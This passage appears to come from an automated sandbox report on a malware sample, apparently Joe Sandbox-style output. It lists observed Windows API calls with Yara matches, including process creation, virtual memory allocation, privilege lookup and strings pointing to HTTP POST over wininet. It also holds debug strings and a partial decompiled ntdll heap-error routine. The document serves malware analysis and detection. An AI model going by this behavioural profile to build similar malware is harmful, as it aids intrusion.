                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd9626dc1f7a7d480f5fa0fa4dadd97e85d0233cc0bdc983d065c8ff21923f8c
                                                    • Instruction ID: d8d736f80c120d99af92767b070d3f73c40cfad4e4bc8d79b82cf363fc090f77
                                                    • Opcode Fuzzy Hash: dd9626dc1f7a7d480f5fa0fa4dadd97e85d0233cc0bdc983d065c8ff21923f8c
                                                    • Instruction Fuzzy Hash: CA018E767496804BC3528E7DDCC41DEFB57BBC226071405AEE0909F681D6218047C3A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 188eb92cc5218b2bc821d0e6f3f127cf7965abec9c6822a5f14355cade1b807b
                                                    • Instruction ID: ea5f96915f6c7f619361df7a1f506267b992d222be2908fc3088c97ecacb800d
                                                    • Opcode Fuzzy Hash: 188eb92cc5218b2bc821d0e6f3f127cf7965abec9c6822a5f14355cade1b807b
                                                    • Instruction Fuzzy Hash: DBF04636B142911AC3129FBEBC529E5FB649BC2324F0446EFE488E7183D621811C87A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00973BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00973BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0097861D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00973BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00973BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0097861D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtReadFile.NTDLL(00973D62,5E972F61,FFFFFFFF,00973A21,?,?,00973D62,?,00973A21,FFFFFFFF,5E972F61,00973D62,?,00000000), ref: 009786C5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtReadFile.NTDLL(00973D62,5E972F61,FFFFFFFF,00973A21,?,?,00973D62,?,00973A21,FFFFFFFF,5E972F61,00973D62,?,00000000), ref: 009786C5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00962D11,00002000,00003000,00000004), ref: 009787E9
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00962D11,00002000,00003000,00000004), ref: 009787E9
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(00973D40,?,?,00973D40,00000000,FFFFFFFF), ref: 00978725
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(00973D40,?,?,00973D40,00000000,FFFFFFFF), ref: 00978725
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00977398
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: POST$net.dll$wininet.dll
                                                    • API String ID: 3472027048-3140911592
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00977398
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00963B93), ref: 0097890D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00963B93), ref: 0097890D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: .z`
                                                    • API String ID: 3298025750-1441809116
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009672CA
                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009672EB
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009789A4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00969BA2
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009789A4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009789A4
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0096CCE0,?,?), ref: 0097745C
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00973526,?,00973C9F,00973C9F,?,00973526,?,?,?,?,?,00000000,00000000,?), ref: 009788CD
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0096CFB2,0096CFB2,?,00000000,?,?), ref: 00978A70
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00967C73,?), ref: 0096D44B
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00967C73,?), ref: 0096D44B
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00967C73,?), ref: 0096D44B
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Strings
                                                    • The resource is owned shared by %d threads, xrefs: 04BFB37E
                                                    • an invalid address, %p, xrefs: 04BFB4CF
                                                    • a NULL pointer, xrefs: 04BFB4E0
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BFB3D6
                                                    • Go determine why that thread has not released the critical section., xrefs: 04BFB3C5
                                                    • *** then kb to get the faulting stack, xrefs: 04BFB51C
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04BFB39B
                                                    • *** enter .cxr %p for the context, xrefs: 04BFB50D
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BFB38F
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04BFB484
                                                    • The resource is owned exclusively by thread %p, xrefs: 04BFB374
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04BFB53F
                                                    • *** enter .exr %p for the exception record, xrefs: 04BFB4F1
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 04BFB48F
                                                    • *** Inpage error in %ws:%s, xrefs: 04BFB418
                                                    • read from, xrefs: 04BFB4AD, 04BFB4B2
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04BFB323
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04BFB2F3
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04BFB476
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04BFB2DC
                                                    • This failed because of error %Ix., xrefs: 04BFB446
                                                    • The critical section is owned by thread %p., xrefs: 04BFB3B9
                                                    • The instruction at %p tried to %s , xrefs: 04BFB4B6
                                                    • The instruction at %p referenced memory at %p., xrefs: 04BFB432
                                                    • write to, xrefs: 04BFB4A6
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04BFB305
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04BFB314
                                                    • <unknown>, xrefs: 04BFB27E, 04BFB2D1, 04BFB350, 04BFB399, 04BFB417, 04BFB48E
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 04BFB352
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04BFB47D
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: 32afd1975841490f705f35e7d83c3b2a1fe5837adcdba895f2ad608d5815ea0e
                                                    • Instruction ID: 2d0eb33045e46fe28bf0fece6336c4748075120780a039af6d0f1464797377dc
                                                    • Opcode Fuzzy Hash: 32afd1975841490f705f35e7d83c3b2a1fe5837adcdba895f2ad608d5815ea0e
                                                    • Instruction Fuzzy Hash: 6B81F475A44210FFEB216B1ACC85E6B3B2AEF46B57F4040C4F6082B122E375B515DAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 44%
                                                    			E04C01C06() {
                                                    				signed int _t27;
                                                    				char* _t104;
                                                    				char* _t105;
                                                    				intOrPtr _t113;
                                                    				intOrPtr _t115;
                                                    				intOrPtr _t117;
                                                    				intOrPtr _t119;
                                                    				intOrPtr _t120;
                                                    
                                                    				_t105 = 0x4b248a4;
                                                    				_t104 = "HEAP: ";
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    					_push(_t104);
                                                    					E04B4B150();
                                                    				} else {
                                                    					E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    				}
                                                    				_push( *0x4c3589c);
                                                    				E04B4B150("Heap error detected at %p (heap handle %p)\n",  *0x4c358a0);
                                                    				_t27 =  *0x4c35898; // 0x0
                                                    				if(_t27 <= 0xf) {
                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M04C01E96))) {
                                                    						case 0:
                                                    							_t105 = "heap_failure_internal";
                                                    							goto L21;
                                                    						case 1:
                                                    							goto L21;
                                                    						case 2:
                                                    							goto L21;
                                                    						case 3:
                                                    							goto L21;
                                                    						case 4:
                                                    							goto L21;
                                                    						case 5:
                                                    							goto L21;
                                                    						case 6:
                                                    							goto L21;
                                                    						case 7:
                                                    							goto L21;
                                                    						case 8:
                                                    							goto L21;
                                                    						case 9:
                                                    							goto L21;
                                                    						case 0xa:
                                                    							goto L21;
                                                    						case 0xb:
                                                    							goto L21;
                                                    						case 0xc:
                                                    							goto L21;
                                                    						case 0xd:
                                                    							goto L21;
                                                    						case 0xe:
                                                    							goto L21;
                                                    						case 0xf:
                                                    							goto L21;
                                                    					}
                                                    				}
                                                    				L21:
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    					_push(_t104);
                                                    					E04B4B150();
                                                    				} else {
                                                    					E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    				}
                                                    				_push(_t105);
                                                    				E04B4B150("Error code: %d - %s\n",  *0x4c35898);
                                                    				_t113 =  *0x4c358a4; // 0x0
                                                    				if(_t113 != 0) {
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E04B4B150();
                                                    					} else {
                                                    						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					E04B4B150("Parameter1: %p\n",  *0x4c358a4);
                                                    				}
                                                    				_t115 =  *0x4c358a8; // 0x0
                                                    				if(_t115 != 0) {
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E04B4B150();
                                                    					} else {
                                                    						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					E04B4B150("Parameter2: %p\n",  *0x4c358a8);
                                                    				}
                                                    				_t117 =  *0x4c358ac; // 0x0
                                                    				if(_t117 != 0) {
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E04B4B150();
                                                    					} else {
                                                    						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					E04B4B150("Parameter3: %p\n",  *0x4c358ac);
                                                    				}
                                                    				_t119 =  *0x4c358b0; // 0x0
                                                    				if(_t119 != 0) {
                                                    					L41:
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E04B4B150();
                                                    					} else {
                                                    						E04B4B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
